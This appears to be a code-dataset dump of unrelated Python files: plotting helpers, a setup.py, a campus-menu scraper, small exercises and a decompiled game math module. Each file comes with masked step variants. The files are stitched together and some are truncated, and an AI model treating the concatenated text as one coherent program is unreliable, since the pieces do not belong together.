if not arr.ndim in [0, 1, 2]:\n raise NotImplementedError\n\n if colorbar:\n cbkwargs = kwargs.copy()\n cbkwargs[\"label\"] = cbarlabel\n add_colorbar(mappable, **cbkwargs)\n\n return ax\n\n\ndef _add_contours(\n *coords,\n zi=None,\n ax=None,\n contours=[],\n cmap=DEFAULT_CONT_COLORMAP,\n vmin=0.0,\n extent=None,\n **kwargs\n):\n \"\"\"\n Add density-based contours to a plot.\n \"\"\"\n # get the contour levels\n percentiles = kwargs.pop(\"percentiles\", True)\n levels = contours or kwargs.get(\"levels\", None)\n pcolor, contour, contourf = get_axis_density_methods(ax)\n if percentiles and not isinstance(levels, int):\n # plot individual percentile contours\n _cs = plot_Z_percentiles(\n *coords,\n zi=zi,\n ax=ax,\n percentiles=levels,\n extent=extent,\n cmap=cmap,\n **kwargs\n )\n mappable = _cs\n else:\n # plot interval contours\n if levels is None:\n levels = MaxNLocator(nbins=10).tick_values(zi.min(), zi.max())\n elif isinstance(levels, int):\n levels = MaxNLocator(nbins=levels).tick_values(zi.min(), zi.max())\n else:\n raise NotImplementedError\n # filled contours\n mappable = contourf(\n *coords, zi, extent=extent, levels=levels, cmap=cmap, vmin=vmin, **kwargs\n )\n # contours\n contour(\n *coords, zi, extent=extent, levels=levels, cmap=cmap, vmin=vmin, **kwargs\n )\n return mappable\n\n\n_add_additional_parameters = True\n\ndensity.__doc__ = density.__doc__.format(\n otherparams=[\n \"\",\n get_additional_params(\n density,\n plt.pcolormesh,\n plt.hist2d,\n plt.hexbin,\n plt.contour,\n plt.contourf,\n header=\"Other Parameters\",\n indent=4,\n subsections=True,\n ),\n ][_add_additional_parameters]\n)\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
from distutils.core import setup
setup(name='greeker',
version='0.3.2-git',
description="scrambles nouns in an XML document to produce a specimen for layout testing",
author="Brian Tingle",
author_email="[email protected]",
url="http://tingletech.github.com/greeker.py/",
install_requires=["inflect>=0.2.1", "lxml>=2.3.2", "nltk>=2.0.1rc2-git", "numpy", "argparse"],
py_modules=['greeker'],
scripts=['greeker.py'],
)
|
normal
|
{
"blob_id": "1fda8274024bdf74e7fbd4ac4a27d6cfe6032a13",
"index": 9790,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsetup(name='greeker', version='0.3.2-git', description=\n 'scrambles nouns in an XML document to produce a specimen for layout testing'\n , author='Brian Tingle', author_email=\n '[email protected]', url=\n 'http://tingletech.github.com/greeker.py/', install_requires=[\n 'inflect>=0.2.1', 'lxml>=2.3.2', 'nltk>=2.0.1rc2-git', 'numpy',\n 'argparse'], py_modules=['greeker'], scripts=['greeker.py'])\n",
"step-3": "from distutils.core import setup\nsetup(name='greeker', version='0.3.2-git', description=\n 'scrambles nouns in an XML document to produce a specimen for layout testing'\n , author='Brian Tingle', author_email=\n '[email protected]', url=\n 'http://tingletech.github.com/greeker.py/', install_requires=[\n 'inflect>=0.2.1', 'lxml>=2.3.2', 'nltk>=2.0.1rc2-git', 'numpy',\n 'argparse'], py_modules=['greeker'], scripts=['greeker.py'])\n",
"step-4": "from distutils.core import setup\nsetup(name='greeker',\n version='0.3.2-git',\n description=\"scrambles nouns in an XML document to produce a specimen for layout testing\",\n author=\"Brian Tingle\",\n author_email=\"[email protected]\",\n url=\"http://tingletech.github.com/greeker.py/\",\n install_requires=[\"inflect>=0.2.1\", \"lxml>=2.3.2\", \"nltk>=2.0.1rc2-git\", \"numpy\", \"argparse\"],\n py_modules=['greeker'],\n scripts=['greeker.py'],\n )\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from BeautifulSoup import BeautifulSoup, NavigableString
from urllib2 import urlopen
from time import ctime
import sys
import os
import re
restaurants = ["http://finweb.rit.edu/diningservices/brickcity",
"http://finweb.rit.edu/diningservices/commons",
"http://finweb.rit.edu/diningservices/crossroads",
"http://finweb.rit.edu/diningservices/gvcantinagrille",
"http://finweb.rit.edu/diningservices/gracies",
"http://finweb.rit.edu/diningservices/ritzsportszone"]
pretty_header = """
---------------------------------------------------
Parser Of On-campus Preferred Specials
a.k.a.
______ ______ ______ ______ _____
| _ | __ | __ | _ |/ ____|
| |_) | | | | | | | |_) | (___
| ___| | | | | | | ___|\___ \\
| | | |__| | |__| | | ____) |
| | | | | | | |
|__| |______|______|__| |_____/
It is currently {curtime}
---------------------------------------------------
[1] Brick City Cafe
[2] Commons
[3] Crossroads
[4] Global Village Cantina and Grille
[5] Gracies
[6] Ritz Sports Zone
[q] Quit
==================================================="""
def menu():
""" Do all the heavy lifting."""
while True:
# Loop till user quits.
sel = 0
while ( sel < 1 or sel > len(restaurants)):
# Input validation
print pretty_header.format(curtime=ctime())
sel = raw_input("Enter your menu choice [1-6 or q]: ")
if sel.lower() == "q":
sys.exit(0)
try:
sel = int(sel)
except:
sel = 0
os.system("clear")
# Load meals from desired restaurant.
html = urlopen(restaurants[sel-1])
soup = BeautifulSoup(html, convertEntities = BeautifulSoup.HTML_ENTITIES)
meals = soup.findAll(id=re.compile("meal_\d"))
tabs = soup.findAll(id=re.compile("tab_\d"))
# get the name of the restaurant, minus the "RIT Dining Services" bs.
print ("\nOn the menu at " + re.sub("^[\w\W]*\s?:\s?", "",
str(soup.title.string)) + " today is:")
meal_num = 0
for meal in meals:
if meal:
# print all meals served + meal name / subrestaurant name
print ("=====================")
print tabs[meal_num].contents[0].string
print ("=====================\n")
meal_num += 1
for item in meal.findAll("li"):
if item.string and str(item.string) != "":
print item.string
print ("\n")
raw_input("Press any key to continue...")
os.system("clear")
if sys.version[0] != "2":
print "This script uses BeautifulSoup for html parsing."
print "BeautifulSoup only supports Python 2.x"
menu()
|
normal
|
{
"blob_id": "02e40e051c19116c9cb3a903e738232dc8f5d026",
"index": 9522,
"step-1": "\nfrom BeautifulSoup import BeautifulSoup, NavigableString\nfrom urllib2 import urlopen\nfrom time import ctime\nimport sys\nimport os\nimport re\nrestaurants = [\"http://finweb.rit.edu/diningservices/brickcity\",\n\"http://finweb.rit.edu/diningservices/commons\",\n\"http://finweb.rit.edu/diningservices/crossroads\",\n\"http://finweb.rit.edu/diningservices/gvcantinagrille\",\n\"http://finweb.rit.edu/diningservices/gracies\",\n\"http://finweb.rit.edu/diningservices/ritzsportszone\"]\n\npretty_header = \"\"\"\n---------------------------------------------------\n Parser Of On-campus Preferred Specials\n a.k.a.\n ______ ______ ______ ______ _____\n | _ | __ | __ | _ |/ ____|\n | |_) | | | | | | | |_) | (___\n | ___| | | | | | | ___|\\___ \\\\\n | | | |__| | |__| | | ____) |\n | | | | | | | |\n |__| |______|______|__| |_____/\n\n\n It is currently {curtime}\n---------------------------------------------------\n[1] Brick City Cafe\n[2] Commons\n[3] Crossroads\n[4] Global Village Cantina and Grille\n[5] Gracies\n[6] Ritz Sports Zone\n[q] Quit\n===================================================\"\"\"\n\ndef menu():\n\t\"\"\" Do all the heavy lifting.\"\"\"\n\twhile True:\n\t\t# Loop till user quits.\n\t\tsel = 0\n\t\twhile ( sel < 1 or sel > len(restaurants)):\n\t\t\t# Input validation\n\t\t\tprint pretty_header.format(curtime=ctime())\n\t\t\tsel = raw_input(\"Enter your menu choice [1-6 or q]: \")\n\t\t\tif sel.lower() == \"q\":\n\t\t\t\tsys.exit(0)\n\t\t\ttry:\n\t\t\t\tsel = int(sel)\n\t\t\texcept:\n\t\t\t\tsel = 0\n\t\t\tos.system(\"clear\")\n\n\t\t# Load meals from desired restaurant.\n\t\thtml = urlopen(restaurants[sel-1])\n\t\tsoup = BeautifulSoup(html, convertEntities = BeautifulSoup.HTML_ENTITIES)\n\t\tmeals = soup.findAll(id=re.compile(\"meal_\\d\"))\n\t\ttabs = soup.findAll(id=re.compile(\"tab_\\d\"))\n\n\t\t# get the name of the restaurant, minus the \"RIT Dining Services\" bs.\n\t\tprint (\"\\nOn the menu at \" + re.sub(\"^[\\w\\W]*\\s?:\\s?\", \"\",\n\t\t\tstr(soup.title.string)) + \" today is:\")\n\t\tmeal_num = 0\n\t\tfor meal in meals:\n\t\t\tif meal:\n\t\t\t\t# print all meals served + meal name / subrestaurant name\n\t\t\t\tprint (\"=====================\")\n\t\t\t\tprint tabs[meal_num].contents[0].string\n\t\t\t\tprint (\"=====================\\n\")\n\t\t\t\tmeal_num += 1\n\t\t\t\tfor item in meal.findAll(\"li\"):\n\t\t\t\t\tif item.string and str(item.string) != \"\":\n\t\t\t\t\t\tprint item.string\n\t\t\t\tprint (\"\\n\")\n\t\traw_input(\"Press any key to continue...\")\n\t\tos.system(\"clear\")\n\nif sys.version[0] != \"2\":\n\tprint \"This script uses BeautifulSoup for html parsing.\"\n\tprint \"BeautifulSoup only supports Python 2.x\"\nmenu()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# coding=utf-8
import sys
if len(sys.argv) == 2:
filepath = sys.argv[1]
pRead = open(filepath,'r')#wordlist.txt
pWrite = open("..\\pro\\hmmsdef.mmf",'w')
time = 0
for line in pRead:
if line != '\n':
line = line[0: len(line) - 1] #去除最后的\n
if line == "sil ":
line = line[0: len(line) - 1]
print line
everyHmmfilepath = "..\\..\\model\\hmm3\\hmm_" + line + ".hmm"
pHmmRead = open(everyHmmfilepath,'r')
if time == 0:
pWrite.write(pHmmRead.read()) # read()读剩余全文
pWrite.write("\n")
time = 1
else:
for i in range(3):
pHmmRead.readline()
pWrite.write(pHmmRead.read())
pWrite.write("\n")
else :
print "the agres must be one"
|
normal
|
{
"blob_id": "9bd6da909baeb859153e3833f0f43d8cbcb66200",
"index": 9324,
"step-1": "# coding=utf-8\nimport sys\nif len(sys.argv) == 2:\n filepath = sys.argv[1]\n pRead = open(filepath,'r')#wordlist.txt\n pWrite = open(\"..\\\\pro\\\\hmmsdef.mmf\",'w')\n time = 0\n for line in pRead:\n if line != '\\n':\n line = line[0: len(line) - 1] #去除最后的\\n\n if line == \"sil \":\n line = line[0: len(line) - 1]\n print line\n everyHmmfilepath = \"..\\\\..\\\\model\\\\hmm3\\\\hmm_\" + line + \".hmm\"\n pHmmRead = open(everyHmmfilepath,'r')\n if time == 0:\n pWrite.write(pHmmRead.read()) # read()读剩余全文\n pWrite.write(\"\\n\")\n time = 1\n else:\n for i in range(3):\n pHmmRead.readline()\n pWrite.write(pHmmRead.read())\n pWrite.write(\"\\n\")\nelse :\n print \"the agres must be one\"",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import itertools
def odds(upper_limit):
return [i for i in range(1,upper_limit,2)]
def evens(upper_limit):
return [i for i in range(0,upper_limit,2)]
nested = [i**j for i in range(1,10) for j in range(1,4)]
vowels = ['a', 'e', 'i', 'o', 'u']
consonants = [chr(i) for i in range(97,123) if chr(i) not in vowels]
ascii_table = {i:chr(i) for i in itertools.chain(range(65,91), range(97,123))}
ascii_lowercase = {i:chr(i) for i in ascii_table.keys() if chr(i) == chr(i).lower()}
if __name__ == "__main__":
print('odds', odds(12))
print('evens', evens(11))
print('nested', nested)
print('consonants', consonants)
print('ord of vowels', [ord(char) for char in vowels])
|
normal
|
{
"blob_id": "a2e4e4a0c49c319df2adb073b11107d3f520aa6e",
"index": 1883,
"step-1": "<mask token>\n\n\ndef evens(upper_limit):\n return [i for i in range(0, upper_limit, 2)]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef odds(upper_limit):\n return [i for i in range(1, upper_limit, 2)]\n\n\ndef evens(upper_limit):\n return [i for i in range(0, upper_limit, 2)]\n\n\n<mask token>\nif __name__ == '__main__':\n print('odds', odds(12))\n print('evens', evens(11))\n print('nested', nested)\n print('consonants', consonants)\n print('ord of vowels', [ord(char) for char in vowels])\n",
"step-3": "<mask token>\n\n\ndef odds(upper_limit):\n return [i for i in range(1, upper_limit, 2)]\n\n\ndef evens(upper_limit):\n return [i for i in range(0, upper_limit, 2)]\n\n\nnested = [(i ** j) for i in range(1, 10) for j in range(1, 4)]\nvowels = ['a', 'e', 'i', 'o', 'u']\nconsonants = [chr(i) for i in range(97, 123) if chr(i) not in vowels]\nascii_table = {i: chr(i) for i in itertools.chain(range(65, 91), range(97, \n 123))}\nascii_lowercase = {i: chr(i) for i in ascii_table.keys() if chr(i) == chr(i\n ).lower()}\nif __name__ == '__main__':\n print('odds', odds(12))\n print('evens', evens(11))\n print('nested', nested)\n print('consonants', consonants)\n print('ord of vowels', [ord(char) for char in vowels])\n",
"step-4": "import itertools\n\n\ndef odds(upper_limit):\n return [i for i in range(1, upper_limit, 2)]\n\n\ndef evens(upper_limit):\n return [i for i in range(0, upper_limit, 2)]\n\n\nnested = [(i ** j) for i in range(1, 10) for j in range(1, 4)]\nvowels = ['a', 'e', 'i', 'o', 'u']\nconsonants = [chr(i) for i in range(97, 123) if chr(i) not in vowels]\nascii_table = {i: chr(i) for i in itertools.chain(range(65, 91), range(97, \n 123))}\nascii_lowercase = {i: chr(i) for i in ascii_table.keys() if chr(i) == chr(i\n ).lower()}\nif __name__ == '__main__':\n print('odds', odds(12))\n print('evens', evens(11))\n print('nested', nested)\n print('consonants', consonants)\n print('ord of vowels', [ord(char) for char in vowels])\n",
"step-5": "import itertools\n\ndef odds(upper_limit):\n return [i for i in range(1,upper_limit,2)]\n\ndef evens(upper_limit):\n return [i for i in range(0,upper_limit,2)]\n\nnested = [i**j for i in range(1,10) for j in range(1,4)]\n\nvowels = ['a', 'e', 'i', 'o', 'u']\n\nconsonants = [chr(i) for i in range(97,123) if chr(i) not in vowels]\n\nascii_table = {i:chr(i) for i in itertools.chain(range(65,91), range(97,123))}\n\nascii_lowercase = {i:chr(i) for i in ascii_table.keys() if chr(i) == chr(i).lower()}\n\n\n\nif __name__ == \"__main__\":\n print('odds', odds(12))\n print('evens', evens(11))\n print('nested', nested) \n print('consonants', consonants)\n print('ord of vowels', [ord(char) for char in vowels]) \n \n\n\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
N = int(input("ingrese el numero de datos a ingresar "))
SP = 0
SO = 0
CP = 0
for i in range(1,N+1,1):
NUM = int(input("ingrese un numero entero "))
if NUM > 0:
SP += NUM
CP += 1
else:
SO += NUM
PG = (SP+SO)/N
PP = SP/CP
print(f"hay { CP } numeros positivos, el promedio general es de { PG } y el promedio de los numeros positivos es de { PP }")
|
normal
|
{
"blob_id": "efc0b8f1c4887810a9c85e34957d664b01c1e92e",
"index": 1453,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(1, N + 1, 1):\n NUM = int(input('ingrese un numero entero '))\n if NUM > 0:\n SP += NUM\n CP += 1\n else:\n SO += NUM\n<mask token>\nprint(\n f'hay {CP} numeros positivos, el promedio general es de {PG} y el promedio de los numeros positivos es de {PP}'\n )\n",
"step-3": "N = int(input('ingrese el numero de datos a ingresar '))\nSP = 0\nSO = 0\nCP = 0\nfor i in range(1, N + 1, 1):\n NUM = int(input('ingrese un numero entero '))\n if NUM > 0:\n SP += NUM\n CP += 1\n else:\n SO += NUM\nPG = (SP + SO) / N\nPP = SP / CP\nprint(\n f'hay {CP} numeros positivos, el promedio general es de {PG} y el promedio de los numeros positivos es de {PP}'\n )\n",
"step-4": "N = int(input(\"ingrese el numero de datos a ingresar \"))\nSP = 0\nSO = 0\nCP = 0\nfor i in range(1,N+1,1):\n NUM = int(input(\"ingrese un numero entero \"))\n if NUM > 0:\n SP += NUM\n CP += 1\n else:\n SO += NUM\nPG = (SP+SO)/N\nPP = SP/CP\nprint(f\"hay { CP } numeros positivos, el promedio general es de { PG } y el promedio de los numeros positivos es de { PP }\")\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
def test(name,message):
print("用户是:" , name)
print("欢迎消息是:",message)
my_list = ['孙悟空','欢迎来疯狂软件']
test(*my_list)
print('*****')
# ###########################
def foo(name,*nums):
print("name参数:",name)
print("nums参数:",nums)
my_tuple = (1,2,3)
foo('fkit',*my_tuple)
print('********')
foo(*my_tuple)
print('*******')
foo(my_tuple)
#############################
def bar(book,price,desc):
print(book,'这本书的价格是:',price)
print('描述信息是:',desc)
print('********')
my_dict = {'price':89,'book':'疯狂python讲义','desc':'这是一本系统全面的python学习图书'}
bar(**my_dict)
print('*******')
#如果是下面的调用形式,不采用逆向参数收集将报错
# TypeError: bar() missing 2 required positional arguments: 'price' and 'desc'
bar(my_dict)
|
normal
|
{
"blob_id": "64fb006ea5ff0d101000dd4329b3d957a326ed1a",
"index": 2387,
"step-1": "def test(name, message):\n print('用户是:', name)\n print('欢迎消息是:', message)\n\n\n<mask token>\n",
"step-2": "def test(name, message):\n print('用户是:', name)\n print('欢迎消息是:', message)\n\n\n<mask token>\n\n\ndef foo(name, *nums):\n print('name参数:', name)\n print('nums参数:', nums)\n\n\n<mask token>\n\n\ndef bar(book, price, desc):\n print(book, '这本书的价格是:', price)\n print('描述信息是:', desc)\n\n\n<mask token>\n",
"step-3": "def test(name, message):\n print('用户是:', name)\n print('欢迎消息是:', message)\n\n\n<mask token>\ntest(*my_list)\nprint('*****')\n\n\ndef foo(name, *nums):\n print('name参数:', name)\n print('nums参数:', nums)\n\n\n<mask token>\nfoo('fkit', *my_tuple)\nprint('********')\nfoo(*my_tuple)\nprint('*******')\nfoo(my_tuple)\n\n\ndef bar(book, price, desc):\n print(book, '这本书的价格是:', price)\n print('描述信息是:', desc)\n\n\nprint('********')\n<mask token>\nbar(**my_dict)\nprint('*******')\nbar(my_dict)\n",
"step-4": "def test(name, message):\n print('用户是:', name)\n print('欢迎消息是:', message)\n\n\nmy_list = ['孙悟空', '欢迎来疯狂软件']\ntest(*my_list)\nprint('*****')\n\n\ndef foo(name, *nums):\n print('name参数:', name)\n print('nums参数:', nums)\n\n\nmy_tuple = 1, 2, 3\nfoo('fkit', *my_tuple)\nprint('********')\nfoo(*my_tuple)\nprint('*******')\nfoo(my_tuple)\n\n\ndef bar(book, price, desc):\n print(book, '这本书的价格是:', price)\n print('描述信息是:', desc)\n\n\nprint('********')\nmy_dict = {'price': 89, 'book': '疯狂python讲义', 'desc': '这是一本系统全面的python学习图书'}\nbar(**my_dict)\nprint('*******')\nbar(my_dict)\n",
"step-5": "def test(name,message):\n print(\"用户是:\" , name)\n print(\"欢迎消息是:\",message)\n\nmy_list = ['孙悟空','欢迎来疯狂软件']\ntest(*my_list)\nprint('*****')\n# ###########################\ndef foo(name,*nums):\n print(\"name参数:\",name)\n print(\"nums参数:\",nums)\nmy_tuple = (1,2,3)\n\nfoo('fkit',*my_tuple)\nprint('********')\nfoo(*my_tuple)\nprint('*******')\nfoo(my_tuple)\n#############################\n\ndef bar(book,price,desc):\n print(book,'这本书的价格是:',price)\n print('描述信息是:',desc)\n\nprint('********')\nmy_dict = {'price':89,'book':'疯狂python讲义','desc':'这是一本系统全面的python学习图书'}\nbar(**my_dict)\nprint('*******')\n#如果是下面的调用形式,不采用逆向参数收集将报错\n# TypeError: bar() missing 2 required positional arguments: 'price' and 'desc'\nbar(my_dict)",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
from _math import Vector2, Vector3, Quaternion, Transform, Vector3Immutable, QuaternionImmutable, minimum_distance
from _math import mod_2pi
from math import pi as PI, sqrt, fmod, floor, atan2, acos, asin, ceil, pi, e
import operator
from sims4.repr_utils import standard_repr
import enum
import native.animation
import sims4.hash_util
from singletons import DEFAULT
TWO_PI = PI*2
EPSILON = 1.192092896e-07
QUATERNION_EPSILON = 0.001
MAX_FLOAT = 3.402823466e+38
MAX_UINT64 = 18446744073709551615
MAX_INT64 = 922337203685477580
MAX_UINT32 = 4294967295
MAX_INT32 = 2147483647
MAX_UINT16 = 65535
MAX_INT16 = 32767
POS_INFINITY = float('inf')
NEG_INFINITY = float('-inf')
FORWARD_AXIS = Vector3.Z_AXIS()
UP_AXIS = Vector3.Y_AXIS()
def clamp(lower_bound, x, upper_bound):
if x < lower_bound:
return lower_bound
if x > upper_bound:
return upper_bound
return x
def interpolate(a, b, fraction):
return a*fraction + (1 - fraction)*b
def linear_seq_gen(start, stop, step, max_count=None):
delta = stop - start
num = floor(abs(delta/step))
if max_count is not None:
num = min(num, max_count - 1)
if num > 0:
for i in range(0, num + 1):
yield start + i*delta/num
else:
yield start
if stop != start:
yield stop
def deg_to_rad(deg):
return deg*PI/180
def rad_to_deg(rad):
return rad*180/PI
def angle_abs_difference(a1, a2):
delta = sims4.math.mod_2pi(a1 - a2)
if delta > sims4.math.PI:
delta = sims4.math.TWO_PI - delta
return delta
def vector_dot(a, b):
return a.x*b.x + a.y*b.y + a.z*b.z
def vector_dot_2d(a, b):
return a.x*b.x + a.z*b.z
def vector_cross(a, b):
return Vector3(a.y*b.z - a.z*b.y, a.z*b.x - a.x*b.z, a.x*b.y - a.y*b.x)
def vector_cross_2d(a, b):
return a.z*b.x - a.x*b.z
def vector_normalize(v):
return v/v.magnitude()
def vector_flatten(v):
return Vector3(v.x, 0, v.z)
def almost_equal(a, b, epsilon=EPSILON):
return abs(a - b) < epsilon
def vector3_almost_equal(v1, v2, epsilon=EPSILON):
return abs(v1.x - v2.x) < epsilon and (abs(v1.y - v2.y) < epsilon and abs(v1.z - v2.z) < epsilon)
def vector3_almost_equal_2d(v1, v2, epsilon=EPSILON):
return abs(v1.x - v2.x) < epsilon and abs(v1.z - v2.z) < epsilon
def quaternion_almost_equal(q1, q2, epsilon=QUATERNION_EPSILON):
if abs(q1.x - q2.x) < epsilon and (abs(q1.y - q2.y) < epsilon and abs(q1.z - q2.z) < epsilon) and abs(q1.w - q2.w) < epsilon:
return True
if abs(q1.x + q2.x) < epsilon and (abs(q1.y + q2.y) < epsilon and abs(q1.z + q2.z) < epsilon) and abs(q1.w + q2.w) < epsilon:
return True
return False
def transform_almost_equal(t1, t2, epsilon=EPSILON, epsilon_orientation=QUATERNION_EPSILON):
if epsilon_orientation is DEFAULT:
epsilon_orientation = epsilon
return vector3_almost_equal(t1.translation, t2.translation, epsilon=epsilon) and quaternion_almost_equal(t1.orientation, t2.orientation, epsilon=epsilon_orientation)
def transform_almost_equal_2d(t1, t2, epsilon=EPSILON, epsilon_orientation=QUATERNION_EPSILON):
if epsilon_orientation is DEFAULT:
epsilon_orientation = epsilon
return vector3_almost_equal_2d(t1.translation, t2.translation, epsilon=epsilon) and quaternion_almost_equal(t1.orientation, t2.orientation, epsilon=epsilon_orientation)
def vector3_rotate_axis_angle(v, angle, axis):
q = Quaternion.from_axis_angle(angle, axis)
return q.transform_vector(v)
def vector3_angle(v):
return atan2(v.x, v.z)
def angle_to_yaw_quaternion(angle):
return Quaternion.from_axis_angle(angle, UP_AXIS)
def yaw_quaternion_to_angle(q):
if almost_equal(q.y, 0.0):
return 0
angle = acos(q.w)*2.0
if q.y > 0:
return angle
return -angle
def get_closest_point_2D(segment, p):
a1 = segment[0]
a2 = segment[1]
(x1, x2) = (a1.x, a2.x)
x3 = p.x
(z1, z2) = (a1.z, a2.z)
z3 = p.z
dx = x2 - x1
dz = z2 - z1
t = ((x3 - x1)*dx + (z3 - z1)*dz)/(dx*dx + dz*dz)
t = sims4.math.clamp(0, t, 1)
x0 = x1 + t*dx
z0 = z1 + t*dz
return Vector3(x0, p.y, z0)
def invert_quaternion(q):
d = 1.0/(q.x*q.x + q.y*q.y + q.z*q.z + q.w*q.w)
return Quaternion(-d*q.x, -d*q.y, -d*q.z, d*q.w)
def get_difference_transform(transform_a, transform_b):
v = transform_b.translation - transform_a.translation
a_q_i = invert_quaternion(transform_a.orientation)
q = Quaternion.concatenate(transform_b.orientation, a_q_i)
v_prime = Quaternion.transform_vector(a_q_i, v)
return Transform(v_prime, q)
class Location:
__qualname__ = 'Location'
__slots__ = ('transform', 'routing_surface', '_parent_ref', 'joint_name_or_hash', 'slot_hash')
def __init__(self, transform, routing_surface, parent=None, joint_name_or_hash=None, slot_hash=0):
self.transform = transform
self.routing_surface = routing_surface
self.parent = parent
self.joint_name_or_hash = joint_name_or_hash
self.slot_hash = slot_hash
def __repr__(self):
return standard_repr(self, self.transform, self.routing_surface, parent=self.parent, joint_name_or_hash=self.joint_name_or_hash, slot_hash=self.slot_hash)
def __eq__(self, other):
if type(self) is not type(other):
return False
if self.transform != other.transform:
return False
if self.parent != other.parent:
return False
if self.routing_surface != other.routing_surface:
return False
slot_hash0 = self.joint_name_or_hash or self.slot_hash
slot_hash1 = other.joint_name_or_hash or other.slot_hash
if slot_hash0 != slot_hash1:
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
@property
def parent(self):
if self._parent_ref is not None:
return self._parent_ref()
@parent.setter
def parent(self, value):
if value is not None:
self._parent_ref = value.ref()
self.routing_surface = None
else:
self._parent_ref = None
@property
def joint_name_hash(self):
if self.joint_name_or_hash is None:
return 0
if isinstance(self.joint_name_or_hash, int):
return self.joint_name_or_hash
return sims4.hash_util.hash32(self.joint_name_or_hash)
@property
def world_routing_surface(self):
if self.parent is not None:
return self.parent.location.world_routing_surface
return self.routing_surface
@property
def zone_id(self):
if self.world_routing_surface.type == 1:
return self.world_routing_surface.primary_id
return sims4.zone_utils.get_zone_id()
@property
def level(self):
return self.world_routing_surface.secondary_id
@property
def world_transform(self):
if self.parent is None:
return self.transform
transform = self.transform
parent = self.parent
if parent.is_part:
parent_transform = parent.part_owner.transform
else:
parent_transform = parent.transform
if self.joint_name_or_hash is None:
if transform is None:
return parent_transform
return sims4.math.Transform.concatenate(transform, parent_transform)
joint_transform = native.animation.get_joint_transform_from_rig(self.parent.rig, self.joint_name_or_hash)
if transform is None:
return sims4.math.Transform.concatenate(joint_transform, parent_transform)
local_transform = sims4.math.Transform.concatenate(transform, joint_transform)
return sims4.math.Transform.concatenate(local_transform, parent_transform)
def duplicate(self):
return type(self)(self.transform, self.routing_surface, self.parent, self.joint_name_or_hash, self.slot_hash)
def clone(self, *, transform=DEFAULT, translation=DEFAULT, orientation=DEFAULT, routing_surface=DEFAULT, parent=DEFAULT, joint_name_or_hash=DEFAULT, slot_hash=DEFAULT):
if transform is DEFAULT:
transform = self.transform
if transform is not None:
if translation is DEFAULT:
translation = transform.translation
if orientation is DEFAULT:
orientation = transform.orientation
transform = Transform(translation, orientation)
if routing_surface is DEFAULT:
routing_surface = self.routing_surface
if parent is DEFAULT:
parent = self.parent
if joint_name_or_hash is DEFAULT:
joint_name_or_hash = self.joint_name_or_hash
if slot_hash is DEFAULT:
slot_hash = self.slot_hash
return type(self)(transform, routing_surface, parent, joint_name_or_hash, slot_hash)
class LinearCurve:
__qualname__ = 'LinearCurve'
__slots__ = ('points',)
def __init__(self, points):
self.points = points
self.points.sort(key=lambda i: i[0])
def get(self, val):
p_max = len(self.points) - 1
if val <= self.points[0][0]:
return self.points[0][1]
if val >= self.points[p_max][0]:
return self.points[p_max][1]
i = p_max - 1
while i > 0:
while val < self.points[i][0]:
i -= 1
p1 = self.points[i]
p2 = self.points[i + 1]
percent = (val - p1[0])/(p2[0] - p1[0])
return (p2[1] - p1[1])*percent + p1[1]
class WeightedUtilityCurve(LinearCurve):
__qualname__ = 'WeightedUtilityCurve'
def __init__(self, points, max_y=0, weight=1):
if max_y == 0:
max_y = self._find_largest_y(points)
transformed_points = [(point[0], point[1]/max_y*weight) for point in points]
super().__init__(transformed_points)
def _find_largest_y(self, points):
max_y = 0
for point in points:
while point[1] > max_y:
max_y = point[1]
return max_y
class CircularUtilityCurve(LinearCurve):
__qualname__ = 'CircularUtilityCurve'
def __init__(self, points, min_x, max_x):
super().__init__(points)
self._min_x = min_x
self._max_x = max_x
last_point = self.points[-1]
distance_to_end = max_x - last_point[0]
total_length = distance_to_end + self.points[0][1]
distance_to_pivot_point = distance_to_end/total_length
pivot_y_value = (self.points[0][1] - last_point[1])*distance_to_pivot_point + self.points[0][1]
self.points.insert(0, (0, pivot_y_value))
self.points.insert(len(self.points), (self._max_x, pivot_y_value))
def get(self, val):
return super().get(val)
class Operator(enum.Int):
__qualname__ = 'Operator'
GREATER = 1
GREATER_OR_EQUAL = 2
EQUAL = 3
NOTEQUAL = 4
LESS_OR_EQUAL = 5
LESS = 6
@staticmethod
def from_function(fn):
if fn == operator.gt:
return Operator.GREATER
if fn == operator.ge:
return Operator.GREATER_OR_EQUAL
if fn == operator.eq:
return Operator.EQUAL
if fn == operator.ne:
return Operator.NOTEQUAL
if fn == operator.le:
return Operator.LESS_OR_EQUAL
if fn == operator.lt:
return Operator.LESS
@property
def function(self):
if self.value == Operator.GREATER:
return operator.gt
if self.value == Operator.GREATER_OR_EQUAL:
return operator.ge
if self.value == Operator.EQUAL:
return operator.eq
if self.value == Operator.NOTEQUAL:
return operator.ne
if self.value == Operator.LESS_OR_EQUAL:
return operator.le
if self.value == Operator.LESS:
return operator.lt
@property
def inverse(self):
if self == Operator.GREATER:
return Operator.LESS_OR_EQUAL
if self == Operator.GREATER_OR_EQUAL:
return Operator.LESS
if self == Operator.EQUAL:
return Operator.NOTEQUAL
if self == Operator.NOTEQUAL:
return Operator.EQUAL
if self == Operator.LESS_OR_EQUAL:
return Operator.GREATER
if self == Operator.LESS:
return Operator.GREATER_OR_EQUAL
@property
def symbol(self):
if self == Operator.GREATER:
return '>'
if self == Operator.GREATER_OR_EQUAL:
return '>='
if self == Operator.EQUAL:
return '=='
if self == Operator.NOTEQUAL:
return '!='
if self == Operator.LESS_OR_EQUAL:
return '<='
if self == Operator.LESS:
return '<'
@property
def category(self):
if self == Operator.GREATER:
return Operator.GREATER
if self == Operator.GREATER_OR_EQUAL:
return Operator.GREATER
if self == Operator.EQUAL:
return Operator.EQUAL
if self == Operator.NOTEQUAL:
return Operator.EQUAL
if self == Operator.LESS_OR_EQUAL:
